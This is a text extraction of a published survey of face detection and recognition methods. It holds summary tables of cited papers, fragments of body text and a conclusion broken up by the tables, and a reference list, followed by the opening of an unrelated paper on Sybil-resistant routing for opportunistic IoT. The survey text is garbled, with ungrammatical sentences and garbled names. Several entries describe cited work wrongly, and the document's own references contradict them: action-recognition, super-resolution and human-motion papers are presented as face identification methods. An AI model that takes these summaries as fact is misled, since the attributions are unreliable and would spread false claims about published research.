Xiangyu Zhu et.al. (2018) based on 3D complex alignment (3DDFA) and 3D Morphable
Interface (3DMM) for facial identification and recognition. Face balance included the
entire posing spectrum. It has achieved variance in the face orientation of the ALFW,
AFW, LFPW, HELEN, IBUG, 300 W, and AFLW 2003D datasets. Comparing the output
of the drop is substituting boundary poses. This approach shows the highest robustness of
initialization of 3DDFA in face identification and recognition [15]
Mei Wanget.ai. (2018) have adapted it to a variety of various strategies. This was used in
the identification and recognition of the face [16]
(continued)
A Survey: Approaches to Facial Detection and Recognition … 113

Table 1 (continued)
Year Description
Changxing Ding et.al. (2018) suggested controlled face function (CPF) for facial
identification and recognition. Using CPF in large-scale studies reveals dominance in
both learning representation and spinning frontal images. The face recognition
experiment in the MultiPIE database offers further information that shows the role of
intensity in particular methods [17]
C. Fabian Benitez-Quiroz et.al. (2018) introduced a facial control device for the
identification and recognition of the face. The facial action device has been developed
to address the issue of recognition using robust machine vision algorithms. These
datasets are used for color functionality by DISFA and AM-FED. This color can also
be used to identify the triggering of the action unit [18]
Cristóvao Cruz et.al. (2018) suggested a single image super resolution (SISR) and CNN
for facial identification and recognition. 1D Wiener filtering operates on resemblance
domains. They are given an appropriate solution to the particular issue of the SISR. Ses
results are sharper reconstruction and in SET5, SET14 and metropolitan datasets. This
approach works well only on the picture of significant self-similarity [19]
2017 Xiaolong Wang et.al. (2017) have suggested a cross-age face authentication algorithm for
facial detection and recognition problems. They also focused comparatively on an
successful compromise between the share of features and the omission of features [20]
Chi Nhan Duong et.al. (2017) suggested a temporary non-volume preservation (TNVP)
and generative adversarial network (GAN) for facial identification and recognition using
FG-NET, MORPH, CACD, and AGFW datasets. TNVP measured both the synthesizing
of advanced age faces and the cross-face testing period with accuracy. TNPV has
promised an appealing density property. They collected information on features and
inferred the importance of successive phases of the face in the assessment of embedded
datasets [21]
Ran He et.al. (2017) suggested infrared visual verses (VSS-NIR) and invariant deep
representation (IDR) using CASIA, NIR-VIS2.0, and broad scale VIS datasets for facial
identification and recognition. In large-scale VIS results, they achieve 94% of the
verification rate compared to the state of the art. This lowers the error rate by 58% only
for a lightweight 64D representation [22]
Lanquering Hu et. al. (2017) suggested an learning displacement field network (
LDP-NET) system for facial identification and recognition using MultiPIE datasets. It
performed on the front end, which offers this insightful information from the datasets.
LDF-NET has achieved increased facial identification and recognition efficiency around
the face [23]
Christain Galea et.al. (2017) focused on the deep convolution neural network (DCNN)
approach to understand facial detection and identification using VGG facial, PRIP HDC,
MEDS II, FRGCV2.0, and MultiPIE. The error rate was lowered from 80.7 to 32.5% by
the use of forensic real-world drawings. The Morphable model has been used to alter
faces from facial features and automatically produces close images [24]
Rajeev Ranjan et.al. (2017) suggested a single deep convolution neural network
(SDCNN) and multitask winning system (MTL) to be used for face detection and
recognition. Ses findings demonstrate the perception of the faces of the networks and the
change, Celeb-A, IMDB + WIKI, and PASCAL datasets obtained. This approach has
been greatly changed. The HyperFace structure of the MLT has been strengthened [25]
(continued)
114 P. Singhal et al.

Table 1 (continued)
Year Description
2016 Yadong Guo et.al. (2016) using the MS-Celeb-1 M, YFW, FG-NET, CASIA, Facebook,
and Google benchmark facial identification and recognition tasks. That training range
includes approximately 75% of celebrities. Face identification requires human actions in
the processing of pictures. Benchmark’s method has worked on very large datasets.
Classification methods have been used to solve the issue of faces in actual applications
[26]
Wen-Sheng et.al. (2016) suggested automated facial action units (AU) and selective
transfer machine (STM) for facial identification and recognition using CK+ ,
GEMEPERA, RU-FACS, and GFT datasets. The experimental outcome of this paper
showed both a facial and a systemic implication. STM has been able to enhance the
efficiency of the test by supplying testing samples. STN can be defined as convex
decision-making and failure logistic expressions [27]
George Trigeorgis et.al. (2016) suggested a semi-non-negative facial detection and
identification matrix factorization algorithm. They use CMU-PIE and XMLVTS
databases for facial identification and recognition. They have been working on
two-dimensional models to understand the expressions. That worked on both clustering
and classification problems was solved by these algorithms. They provide different
attribute information to communicate with different data sources [28]
Icapo Masi et.al. (2016) suggested a pose conscious model (PAM) using IARPA, LFW,
CASIA, YTF, IJB-A, and PIPA to solve the issue of facial identification and recognition.
These models have given a solution at the optimization stage and mitigate the lack of sort
regularization. Performance of all selection model function on pipeline recognition
models [29]
Zhifeng Li et.al. (2016) has developed a system based on a hierarchical function. They
work on two layers of learning using spatial pattern selection (LPS). The result was
higher than 94.20% in separate datasets such as MORPH, FG-NET, and Album2 datasets.
They got clearer results using MORPH and Album2 datasets. They have offered a better
performance that is limited significantly to the faces [30]
Mustafa Mehdipur Ghazi et.al. (2016) partnered with CNN on VGG systems to boost the
performance of facial identification and recognition. It has been applied in deep learning
models. They offered effective expression and presentation in the identification and
recognition of the face. It has focused on a holistic appraisal based on representation.
They have had a better outcome in varying conditions [31]
Ju Yong Chang (2016) has suggested a system of gesture identification. This is named the
systemic support vector machine (SSVM) and the conditional random field (CRF) for
facial identification and recognition. They also developed an efficient gesture recognition
tool for use in actual gesture datasets. The CRF model uses non-parameters and different
functions. Working on the learning system to support the SSVM application, LAP and
MSRC-12 datasets were used [32]
Bastain Wandt et.al. (2016) suggested historically qualified base positions and predefined
skeletal anthropometric restrictions for facial identification and recognition. The 3D
architecture uses human expression from a monocular picture series. This models use
periodic functions. That worked on the weights in the base poses. They give an efficient
outcome in stable on a periodic basis. The suggested system data of the KTH datasets
will be used as an outdoor obstacle jump sequence [33]
(continued)
A Survey: Approaches to Facial Detection and Recognition … 115

Table 1 (continued)
Year Description
Pan Zhou et.al. (2016) introduced the new low-level representation (LatRR) and PCA for
facial identification and recognition. The suggested approach is to obtain better outcomes
for classification. Another representation-based paradigm and state-of-the-art methods of
identification, also with a simplified linear grouping. In huge collection of datasets
(YALEB, AR, Pe, and UCFF-50) by implementing L1 filtering algorithms. This approach
is also much better in compression than any other system [34]
Chunlei Peng et.al. (2016) suggested a multi-representation technique for face sketch
photo synthesis (MrFSPS) and Markov for face detection and recognition. This process is
used to implement current synthesis processes. Improved face recognition findings have
been obtained to boost the image accuracy of CUHK, FERET, IIT-D, FG-NET, and LFW
datasets. This datasets are based on various synthesis technique models. They have been
used to synthesize facial recognition technologies with positive results [35]
Chao Dong et.al. (2016) introduced a single super resolution deep CNN (SRDCNN) for
facial identification and recognition. SRCNN also focused on the end of mapping
between low and high resolution images. They optimized the bit using pre-processing and
post-processing techniques [36]
2015 Jiwen Lu et.al. (2015) suggested a binary face descriptor (CBFD), pixel-related vectors
(PDVs), and dynamic CBED (CCBED) program for facial identification and recognition.
CBFD minimized the modality gap for heterogeneous face matching databases FERET,
CAS-PEA, LFW, PASC, CASIA, and NIR-VIS2.0. A successful outcome has been
obtained through the implementation of object recognition, face detection, and further
proof of the usefulness of the features [37]
Huazhu Fu et. al. (2015) suggested a multi-scale collection graph (MSG) system for face
identification and recognition. It has an indication function for the proper treatment of
cases. They have found the missing item in some popular videos. MSG has developed a
shared context system to enhance the outcome. This helps to solve the problem with the
expansion of the regular graph in the images. It worked on several state collections of
features in pictures. This has facilitated optimization of the current energy minimization
level [38]
Changxing Ding et.al. (2015) introduced multitask translation function learning
(MTFTL) and patch dependent partial representation (IBPR) for face detection and
recognition. Operated on the training picture of the FERET, CMU-PIE, MultiPIE, and
LFW databases. The great benefit of the current system has been updated by the new
solution. This strategy has given unregulated faces to the issues of authentication and
recognition. They have to find optimal results using LFW datasets [39]
2014 Javier Galbally et.al. (2014) have suggested a technological approach to the issue of false
photos in the identification and recognition of the face. It has reliably worked in
high-level characteristics for various forms of biometric attacks. The author also made
new possibilities for the future in this article, including the assessment, inclusion, and use
of video quality measures [40]
(continued)
116 P. Singhal et al.

Table 1 (continued)
Year Description
Zhen Lei et.al. (2014) Gabor and local binary-based sequence discriminant face
descriptor (DFD) and coupled FDD (CDFD) have been proposed for facial identification
and recognition. The coupled image function distance in heterogeneous faces in the
photographs using filters has been minimized. DFD has tested and provides improved
performance in all small datasets such as FERET, LFW, CAS-pEAL-R1, and HFB. It has
generated a positive consequence of generalization. It has also developed a comparative
descriptor for face success under different conditions [41]
2013 Yizhe Zhang et.al. (2013) introduced a high-level function learning system for facial
identification and recognition. These approaches have solved the dilemma of several to
one high-level face learning functionality. They removed presenting invariant and even
unequal identity characteristics in the CMU and MultiPIE databases [42]
Shuiwang Ji et.al. (2013) used CNN and 3DCNN for the identification and recognition of
the face. 3D convolutions have provided improved efficiency in extracting spatial and
temporal information. Move and information encoded to several neighboring KTH
frames have been worked on and performed on TRECVED databases. The 3DCNN
model is superior to the separate TRECVED data form. The KTH databases can be
competitive [43]

about the face images. Face identification and authentication of unknown individuals
are very critical factor. The moving target is a very difficult topic in face recogni-
tion and also faces another challenge in the object’s aging and non-rigid motion.
Learning discriminating looks in face-representation is based upon invariant poses
in face recognition. Face detection is a big concern in facial recognition systems.
This challenge is the recognition of various ways to change poses to the piece. But it
contrasts the information with the image of the checked face and the images of the
recorded face.
3D face detection and recognition algorithms work well for pose variance, speech,
lighting, and also for low-light images. In a transparent and unregulated setting, the
contrast of these variables raises illumination and expression. Pre-processing is the
fundamental and essential stage in the processing of images, and post-processing
is used to manipulate images. They remove the characteristics present in the face
in post-processing techniques such as skin color, eye color, nose height and related
characteristics, etc. In the learning of feature extraction, various methods are used to
quantify the features in artifacts of face detection and recognition.
In face identification and recognition, the directed encoder employs mutual
random faces (RFs) to identify the facial appearances between the test faces and
the recorded faces [1]. Random function fits faces pattern used in database.
The attributes of the faces and the degree of conformity there are handled and
investigated through discriminative identification functions, such as size, skin tone,
and pose. A typical analysis of alignment of features is to cover the facial features.
They cover numerous positions of either deterministic or nonlinear deterministic
transferable phrases. The typical structure’s face recognition is the same pose,
lighting, and extraction value, but their names are different. It means they have
A Survey: Approaches to Facial Detection and Recognition … 117

Table 2 Description of techniques, merit and demerits


Technique Result Merit Demerit
Collaborative random SME and RF model are RF model is work on pose RF and SME do
faces(CRF) and sparse improving 7% on variant faces. SME work not give positive
many-to-one encoder MultiPIE and 14% You on comparing multiple result on
(SME) [1] Tube database(YTF) image to single image constraint poses
Unsupervised learning This technique has This method has worked The object
and and joint optimization exploring the concept of on publically using segmentation
framework has improved saliency and objectness in datasets. These techniques iteratively work
the performance of different type of multiple have provided out the
co-segmentation. They images or datasets high-quality result on both region-wise.
have also improved co-saliency and Adaptive saliency
co-saliency priors [2, 7] co-segmentation map fusion has
transfer useful
information to
different task
Non-blind deconvolution This algorithm has This method has detecting Non-blind
scheme has to suppress to performed favorably light stretches in blurry deconvolution
the ringing artifacts against state-of-art images. And incorporates method has not
covered by the light [3, 4] deblurring for low-light them into an optimization generated
images frame works satisfactory results
in present of
drastic loss of
information
CNN, R-CNN, RexNet is providing RexNet has achieved clear RexNet is based
RegionNET OR RexNET, saliency mapping between detection boundary. And it on the
salient object detection [5] end to end with sharp has also achieved segmentation of
object boundaries multi-scale conceptual images
robustness
Image filtering SCBP descriptor is CBP is improving the The major issue
binarization and spatial handcraft by 6RF Eigen robustness of LBP. DFD has solved by an
histogram, Scattering filters. They are sufficient and CBFD are derived optimized
Compressive Binary to achieve accurate and noise sensitive filtering descriptors. That
Pattern (SCBP) [6] robust performance adapting to fine grained has combined
structure distinctiveness,
robustness, and
compactness
Regression forest-based This has improved They have found effective This method has
algorithms [8] consistency and result in consecutively performs highly
computationally in multiple related features competitive
efficient manner. Those in head pose and relative accuracy. That has
have found robust result in approaches score on a range
3D face rotation of benchmarks
Multi-model self-paced Object detection has used It has used discriminative They have not
learning for detection large-scale unlabeled knowledge to solve the detected every
(MSPLD), few example image. But also used few problem of images using complicated
object detection (FEOD) labeled image in some for different image image in datasets
[9] category detection model
(continued)
118 P. Singhal et al.

Table 2 (continued)
Technique Result Merit Demerit
Switching adaptive The similarity of edges SAMFWMF is performed They have
median and fixed has adopted the properties better structural metrics. provided better
weighted mean filter using median filters. They They have provided good result in high
(SAMFWMF) [10] have provided better result result in contrast using intensity impulse
in sharpness and common method of noise with edges
smoothness property in thresholding
edges
Tensor rank preserving TRPDA has provided They have extracted They have worked
discriminant highest recognition rates extract feature with the on two order
analysis(TRPDA) [11] and better performance rank module. They have tensor. They have
unstable manifold included with an
learning methods arrow and column
Recurrent face aging The accuracy has shown The triple layer RFA RFA framework
(RFA) RNN [12] that RFA is worked better framework GRU gives the does not work on
than RNN, because they better identity information integrate the age
have performed than bi layer GRU estimation
65.43–61.00%
Markov random field This method has They have captured These systems are
energy optimization [13] especially based on wide images in various using sensitive
baseline multi-view conditions. They have camera parameters
environment worked very smoothly and
efficiently
Joint and individual They have improving They have improved They have
variance explained accuracy and validate the accuracy when the produced the
(JPVE), robust-JIVE identity of information differences of each pairs problem of age in
(RJIVE) [14] are maximum invariant face and
becomes more
difficult to
differences in
faces
3D dense face alignment Face alignment has This method has replaced They have
(3DDFA) and 3D worked on pose range and the boundary boxes using produced large
Morphable model also worked on 3D 3DDFA artifacts and
(3DMM) [15] Morphable model invisible region
filling
controlled face feature These methods have Face recognition Auxiliary subtask
(CPF) [16, 17] worked on superiority in experiment on MultiPIE under an
both learning database provide more unsupervised way
representation and rotating evidence and strength is universal to all
non frontal images datasets
(continued)

registered the same images on different identities so determining the true meaning of
the image is a major challenge. Learning function in this scenario plays a significant
role in determining the true meaning of the pictures. In this paper, we are presenting
the latest literature of the face specific problem and solution. We are trying to express
best solution of the face-related problem.
A Survey: Approaches to Facial Detection and Recognition … 119

Table 2 (continued)
Technique Result Merit Demerit
Facial action units(AUs) They have provided to They have used color They have not
[18] identification of AUs model for detecting to AU provided good
using color features in activation efficiency in skin
datasets color
Single image super SISR have given good They have performed They have not
resolution, CNN [19] result in similar domain better result in self leaded to training
using 1D wiener filtering -similar object and relies input
images
Cross-age face These methods improved They have work on They have not
verification [20] over the performance from effectively balance feature provided good
2.2% EER on MORPH sharing and feature result in small
7.8% EER on FG-NET by exclusion between the two datasets and also a
more than 50 and 59.7% tasks large number of
datasets
Temporal non-volume They have consecutively They have guaranteed This method has a
preserving (TNVP), worked on synthesizing inference and evaluate the big issue to solve
generative adversarial age progressed faces and feature in consecutive large-scale
networks (GAN) [21] cross-age face verification stages problem
Visual versus near infrared This technique achieves They have provided good We observe that
(VIS–NIR), invariant deep 94% verification rate result and reduces the IDR are almost
representation (IDR) [22] large-scale VIS data error rate of 58% only obtain the lowest
with a compact 64D performance
representation among the three
implementation
Learning displacement LDF-NET achieved They have provided good They have
field network(LDF-NET) frontal image using useful face recognition using perform low
[23] information in original MultiPIE datasets efficient better
images than 2D
Deep convolution neutral They have reduced the A face image recognize This algorithm is
network (DCNN) [24] error rate of 80.7–32.5 in 3D Morphable model to using primary the
real-world forensic images improve facial features in limited number
new images sketches images
available
Single deep convolution This model has a better This method performed FDDB has failed
neutral network(SDCNN), understand to the faces better than HyperFace to capture small
multi-task learning frame and achieved good result using MTL frameworks faces in any region
work (MTL) [25] for most of these tasks of the proposal
Bench mark task [26] This approach has worked They have worked on This method does
on testing databases large datasets to solve not remove noise
representing 75% of classification problem in from datasets
celebrities names. This computer vision and there
accepts the applications
disambiguation property
of human expression
(continued)
120 P. Singhal et al.

Table 2 (continued)
Technique Result Merit Demerit
Automatic facial action STM has capable to detect STM has extended the It has found
unit (AU), selective and improve both AU and classifier with losses of common feedback
transfer machine (STM) holistic expression. They convex decision and in supervised
[27] have improving the logistic expressions domain and lack
performance of selected of training
samples in a nearest test datasets
samples
Semi-non-negative matrix This model has worked on They have not provided They are not able
factorization [28] to learn the good result in datasets. to solve the area of
two-dimensional They have worked on speech recognition
representation. They have annotated attributes and
provided a good result in different data sources
classification and
clustering
Pose aware models This model has to design They have analysis of These models
(PAM), CNN [29] for solving the regular IJB-A. They have have worked on
problem and optimizes the evaluated landmarks and only training
point and loss improve the accuracy of PAMs with a
minimization pose estimation single
optimization
framework
Hierarchical method These models have These experiments This method is not
based on two level improved the accuracy of perform better result in work better in
learning, local pattern 94.2% using LPS MORPH, Album2 datasets low-level images
selection (LPS) [30]
VGG framework, CNN It have worked on They have provided a They have find in
[31] pre-processed the face multiple features in faces limited data
recognition and provide a and evaluated a n under provided by the
powerful representation various circumstances mismatched
conditions
Gesture recognition They have provided SSVM framework has They have not
method, conditional effective gesture and face found novel gesture evaluated criteria
random field (CRF), recognition in challenging recognition in CRF model. itself in proposed
structural support vector real gesture-based datasets They have worked on datasets
machine (SSVM) [32] multiple features in
matching algorithms
A priorly trained base 3D construction of human Proposed method Proposed method
poses, predefined motion from monocular performs well under working good
skeletion anthropometrics image sequence. Using occlusions, noise and result on
constraints [33] periodic functions to real-world data of the high-level noise of
model the weights of the KTH datasets as well as the reconstruction.
base poses turned out to our outdoor obstacle jump They are not
be very effective and sequence finding better
stable on periodic motion result on low-level
noise
(continued)
A Survey: Approaches to Facial Detection and Recognition … 121

Table 2 (continued)
Technique Result Merit Demerit
Latest low rank Proposed method find On larger scale datasets by In the same spirit,
representation (LatLRR), better classification results adopting the Ll-filtering we will try
PCA [34] other than algorithms. They have integrating other
representation-based given better performance feature learning
method and even with a than other algorithms methods with
simpler linear more sophisticated
classification classification array
Multiple This approach has work They have performed These datasets has
representation-based face superior performance in forensic sketch datasets work very less size
sketch photo synthesis multiple datasets using using dependent style to so unfortunately it
(MrFSPS), Markow existing method and improve the face has not easy to
model [35] quality-based recognition promising find exact result of
performance results large number
Single image super The proposed SRCNN has They have learnt end to The extra activity
resolution deep CNN capable to improve the end communication using has explored more
(SRCNN) [36] reconstruction of images low-level and high-level filters using other
in natural corresponding resolutions training strategies
channels
Compact binary face These have worked on They have applied They have learned
descriptor (CBFD), pixel heterogeneous face different—different only single layer
different vectors (PDVs), recognition. They have application of face datasets nor for all
coupled-CBFD(CC-BFD) reduces the modality gap recognition. They have datasets
[37] in datasets using work on object
heterogeneous face recognition and visual
through matching tackling
Multi-state selection This method has They have provides They have not
graph(MSG) [38] incorporates an indicator general and global given exact
matrix. They have framework. They have performance every
handling accurate value of allowed optimization for video
missing common extending standard graph
foreground object in some models
videos
Multitask feature They have applied They have slightly They have
transformation arbitrary poses I face modified to tackle the inoculated
learning(MTFTL), images. There is a very unconstrained face different pose in
patch-based partial beneficial for existing verification problem. They face texture
representation(PBPR) method have find top level
[39] performance in
challenging datasets
(continued)

7 Conclusions

This paper analyzed systematic studies of facial recognition and machine learning
techniques, including numerous tactics and datasets. This paper includes a detailed
review of face recognition and distinguishing using various techniques by the
researchers. Machine-based learning approaches solve numerous problems related
122 P. Singhal et al.

Table 2 (continued)
Technique Result Merit Demerit
software-based fake This method has to able to They have to provide new This approach is
detection method [40] perform high level for possibilities evaluation of perform better in
different biometric traits. future including high level not in
They have solved the evaluation, inclusion and low-level attacks
problem in different type used of video quality
of attacks measures
Gabor and local binary They have learnt to reduce This has a good Proposed DFD
patterns, discriminant face image filters with generalization and does not work on
descriptor (DFD), heterogeneous gap in face competitive descriptor in video-based
coupled-DFD(CDFD) images. They have face recognition under analysis
[41] examined both various circumstances
constrained and
unconstrained face
databases
High-level feature They have produces a They have reduced one to This method is
learning scheme [42] novel technique. To work one and many-to-one working on
on many-to-one high-level encoder to remove the high-level feature
face feature learning. impact diverse poses in learning
These have extracted future. It has enhanced the
invariant and pose free features in
discriminative identity multiple random faces
face features from facial
images
CNN, 3DCNN [43] They have the These models have 3DCNN is work a
characteristics derived in outperform compared to supervised
spatial as well as temporal TRECVID data, while learning training
dimensions. They have 3D they have achieved better data not are work
convolutions performed to performance in KTH on unsupervised
record the wave, details in database training database
encoded several adjacent
objects

to pattern identification, facial expression recognition, and scanning recognition.


Deep learning techniques are focused here on the identification and recognition of
restricted and uncompromising faces processed for actual photos and images. This
paper highlighted state-of-the-art technologies and its approach to facial recognition
and identification by using several facial charts, images, and videos in real time. It can
be shown that more and more neuronal links, pooling layers, and entirely connected
layers are done with the problem seen in the visualization and the images. The
outcomes are stronger. Author also tried to discuss about the main factor that is accu-
racy that makes an important outcome of implemented techniques. This papers help
the various upcoming researches to get the confined overview of numerous techniques
that can be applied to image processing or facial recognition and identification.
A Survey: Approaches to Facial Detection and Recognition … 123

References

1. Shao, M., Zhang, Y., & Fu, Y. (2018). Collaborative random faces-guided encoders for pose-
invariant face representation learning. IEEE Transactions on Neural Networks and Learning
Systems, 29(4), 1019–1032.
2. Tsai, C. C., Li, W., Hsu, K. J., Qian, X., & Lin, Y. Y. (2019). Image co-saliency detection and
co-segmentation via progressive joint optimization. IEEE Transactions on Image Processing,
28(1), 56–71.
3. Hu, Z., Cho, S., Wang, J., & Yang, M. H. (2014). Deblurring low-light images with light
streaks. In Proceedings of the IEEE Conference on Computer Vision and Pattern Recognition
(pp. 3382–3389).
4. Anwar, S., Huynh, C. P., & Porikli, F. (2018). Image deblurring with a class-specific prior. IEEE
Transactions on Pattern Analysis and Machine Intelligence.
5. Wang, X., Ma, H., Chen, X., & You, S. (2018). Edge preserving and multi-scale contextual
neural network for salient object detection. IEEE Transactions on Image Processing, 27(1),
121–134.
6. Deng, W., Hu, J., & Guo, J. (2018). Compressive binary patterns: Designing a robust binary face
descriptor with random-field eigenfilters. IEEE Transactions on Pattern Analysis & Machine
Intelligence, 1, 1–1.
7. Jerripothula, K. R., Cai, J., & Yuan, J. (2018). Quality-guided fusion-based co-saliency
estimation for image co-segmentation and co-localization. IEEE Transactions on Multimedia.
8. Tulyakov, S., Jeni, L. A., Cohn, J. F., & Sebe, N. (2018). consistent 3D face alignment. IEEE
Transactions on Pattern Analysis and Machine Intelligence, 40(9), 2250–2264.
9. Dong, X., Zheng, L., Ma, F., Yang, Y., & Meng, D. (2018). Few-example object detection with
model communication. IEEE Transactions on Pattern Analysis & Machine Intelligence, 1, 1–1.
10. Mafi, M., Rajaei, H., Cabrerizo, M., & Adjouadi, M. (2018). A robust edge detection approach
in the presence of high impulse noise intensity through switching adaptive median and fixed
weighted mean filtering. IEEE Transactions on Image Processing, 27(11), 5475–5490.
11. Tao, D., Guo, Y., Li, Y., & Gao, X. (2018). Tensor rank preserving discriminant analysis for
facial recognition. IEEE Transactions on Image Processing, 27(1), 325–334.
12. Wang, W., Yan, Y., Cui, Z., Feng, J., Yan, S., & Sebe, N. (2018). Recurrent face aging with
hierarchical autoregressive memory. IEEE Transactions on Pattern Analysis and Machine
Intelligence.
13. Jeong, S., Lee, J., Kim, B., Kim, Y., & Noh, J. (2018). Object segmentation ensuring consis-
tency across multi-viewpoint images. IEEE Transactions on Pattern Analysis and Machine
Intelligence, 40(10), 2455–2468.
14. Sagonas, C., Ververas, E., Panagakis, Y., & Zafeiriou, S. (2018). Recovering joint and individual
components in facial data. IEEE Transactions on Pattern Analysis and Machine Intelligence,
40(11), 2668–2681.
15. Zhu, X., Lei, Z., & Li, S. Z. (2017). Face alignment in full pose range: A 3D total solution. IEEE
Transactions on Pattern Analysis and Machine Intelligence.
16. Wang, M., & Deng, W. (2018). Deep face recognition: A survey. arXiv preprint arXiv:1804.
06655.
17. Qian, Y., Deng, W., & Hu, J. (2018, May). Task specific networks for identity and face variation.
In 2018 13th IEEE International Conference on Automatic Face & Gesture Recognition (FG
2018) (pp. 271–277). IEEE.
18. Benitez-Quiroz, F., Srinivasan, R., & Martinez, A. M. (2018). Discriminant functional learning
of color features for the recognition of facial action units and their intensities. IEEE Transactions
on Pattern Analysis and Machine Intelligence.
19. Cruz, C., Mehta, R., Katkovnik, V., & Egiazarian, K. O. (2018). Single image super-resolution
based on Wiener filter in similarity domain. IEEE Transactions on Image Processing, 27(3),
1376–1389.
124 P. Singhal et al.

20. Wang, X., Zhou, Y., Kong, D., Currey, J., Li, D., & Zhou, J. (2017, May). Unleash the black
magic in age: a multi-task deep neural network approach for cross-age face verification. In 2017
12th IEEE International Conference on Automatic Face & Gesture Recognition (FG 2017)
(pp. 596–603). IEEE.
21. Duong, C. N., Quach, K. G., Luu, K., Le, T. H. N., & Savvides, M. (2017, Oct). Temporal
non-volume preserving approach to facial age-progression and age-invariant face recognition.
In 2017 IEEE International Conference on Computer Vision (ICCV) (pp. 3755–3763). IEEE.
22. He, R., Wu, X., Sun, Z., & Tan, T. (2017). Learning Invariant Deep Representation for NIR-VIS
Face Recognition. In AAAI (Vol. 4, pp. 7).
23. Hu, L., Kan, M., Shan, S., Song, X., & Chen, X. (2017, May). LDF-Net: Learning a
displacement field network for face recognition across pose. In 2017 12th IEEE International
Conference on Automatic Face & Gesture Recognition (FG 2017) (pp. 9–16). IEEE.
24. Galea, C., & Farrugia, R. A. (2017). Forensic face photo-sketch recognition using a deep
learning-based architecture. IEEE Signal Processing Letters, 24(11), 1586–1590.
25. Ranjan, R., Sankaranarayanan, S., Castillo, C. D., & Chellappa, R. (2017, May). An all-in-one
convolutional neural network for face analysis. In 2017 12th IEEE International Conference
on Automatic Face & Gesture Recognition (FG 2017) (pp. 17–24). IEEE.
26. Guo, Y., Zhang, L., Hu, Y., He, X., & Gao, J. (2016, Oct). Ms-celeb-1m: A dataset and
benchmark for large-scale face recognition. In European Conference on Computer Vision
(pp. 87–102). Springer, Cham.
27. Chu, W. S., De la Torre, F., & Cohn, J. F. (2017). Selective transfer machine for personalized
facial expression analysis. IEEE Transactions on Pattern Analysis and Machine Intelligence,
39(3), 529–545.
28. Trigeorgis, G., Bousmalis, K., Zafeiriou, S., & Schuller, B. W. (2017). A deep matrix factor-
ization method for learning attribute representations. IEEE Transactions on Pattern Analysis
and Machine Intelligence, 39(3), 417–429.
29. Masi, I., Chang, F. J., Choi, J., Harel, S., Kim, J., Kim, K., & AbdAlmageed, W. (2018).
Learning pose-aware models for pose-invariant face recognition in the wild. IEEE Transactions
on Pattern Analysis and Machine Intelligence.
30. Li, Z., Gong, D., Li, X., & Tao, D. (2016). Aging face recognition: A hierarchical learning model
based on local patterns selection. IEEE Transactions on Image Processing, 25(5), 2146–2154.
31. Mehdipour Ghazi, M., & Kemal Ekenel, H. (2016). A comprehensive analysis of deep learning
based representation for face recognition. In Proceedings of the IEEE Conference on Computer
Vision and Pattern Recognition Workshops (pp. 34–41).
32. Chang, J. Y. (2016). Nonparametric feature matching based conditional random fields for
gesture recognition from multi-modal video. IEEE transactions on pattern analysis and
machine intelligence, 38(8), 1612–1625.
33. Wandt, B., Ackermann, H., & Rosenhahn, B. (2016). 3d reconstruction of human motion from
monocular image sequences. IEEE Transactions on Pattern Analysis and Machine Intelligence,
38(8), 1505–1516.
34. Zhou, P., Lin, Z., & Zhang, C. (2016). Integrated low-rank-based discriminative feature learning
for recognition. IEEE Transactions on Neural Networks and Learning Systems, 27(5), 1080–
1093.
35. Peng, C., Gao, X., Wang, N., Tao, D., Li, X., & Li, J. (2016). Multiple Representations-Based
Face Sketch-Photo Synthesis. IEEE Transactions on Neural Networks and Learning Systems,
27(11), 2201–2215.
36. Dong, C., Loy, C. C., He, K., & Tang, X. (2016). Image super-resolution using deep convo-
lutional networks. IEEE Transactions on Pattern Analysis and Machine Intelligence, 38(2),
295–307.
37. Lu, J., Liong, V. E., Zhou, X., & Zhou, J. (2015). Learning compact binary face descriptor for
face recognition. IEEE Transactions on Pattern Analysis and Machine Intelligence, 37(10),
2041–2056.
38. Fu, H., Xu, D., Zhang, B., Lin, S., & Ward, R. K. (2015). Object-based multiple foreground
video co-segmentation via multi-state selection graph. IEEE Transactions on Image Processing,
24(11), 3415–3424.
A Survey: Approaches to Facial Detection and Recognition … 125

39. Ding, C., Xu, C., & Tao, D. (2015). Multi-task pose-invariant face recognition. IEEE
Transactions on Image Processing, 24(3), 980–993.
40. Galbally, J., Marcel, S., & Fierrez, J. (2014). Image quality assessment for fake biometric
detection: Application to iris, fingerprint, and face recognition. IEEE Transactions on Image
Processing, 23(2), 710–724.
41. Lei, Z., Pietikäinen, M., & Li, S. Z. (2014). Learning discriminant face descriptor. IEEE
Transactions on Pattern Analysis and Machine Intelligence, 36(2), 289–302.
42. Zhang, Y., Shao, M., Wong, E. K., & Fu, Y. (2013). Random faces guided sparse many-to-
one encoder for pose-invariant face recognition. In Proceedings of the IEEE International
Conference on Computer Vision (pp. 2416–2423).
43. Ji, S., Xu, W., Yang, M., & Yu, K. (2013). 3D convolutional neural networks for human action
recognition. IEEE Transactions on Pattern Analysis and Machine Intelligence, 35(1), 221–231.
An Energy- and Space-Efficient
Trust-Based Secure Routing for OppIoT

Nisha Kandhoul and Sanjay K. Dhurandher

Abstract Internet of Things (IoT ) is a collection of Internet-connected devices,


sensors or humans, having sensing and data sharing capabilities. Opportunistic net-
works (OppNets) are a subclass of DTN characterized by intermittent connectivity
and varying network topology. Opportunistic Internet of Things (OppIoT ) brings the
flexibility of OppNets to IoT where the opportunistic nature of human contacts is
utilized for data sharing among devices and humans. The excessive heterogeneity of
devices and vast scale of OppIoT systems magnifies the security threats. Users data
are insecure as they are exposed to attacks from uncertified users or devices present
across the network. In addition to ensuring the security, the efficiency of the routing
procedures needs to be addressed. The network is usually composed of battery and
space-limited devices with constrained storage. Considering the power and space
constraints of the devices while preventing the data is important for OppIoT. This
paper proposes a secure, energy- and space-efficient technique based on trust for
OppIoT that provides defense against Sybil attack called ES_T_CAFE. The simu-
lation results obtained using opportunistic network environment (ONE) simulator
show that ES_T_CAFE enhances the efficiency of the network and provides security
against Sybil attack. ES_T_CAFE outperforms existing routing protocols, T_CAFE
and ELPFR-MC, in terms of higher probability of message delivery, lower count of
dropped messages and higher residual energy.

Keywords Opportunistic Internet of Things · Energy efficiency · Space


efficiency · Trust, Sybil Attack

N. Kandhoul (B)
Division of Information Technology, NSIT, University of Delhi, New Delhi, India
S. K. Dhurandher
Department of Information Technology, Netaji Subhas University of Technology, New Delhi,
India

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 127
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_10
128 N. Kandhoul and S. K. Dhurandher

1 Introduction

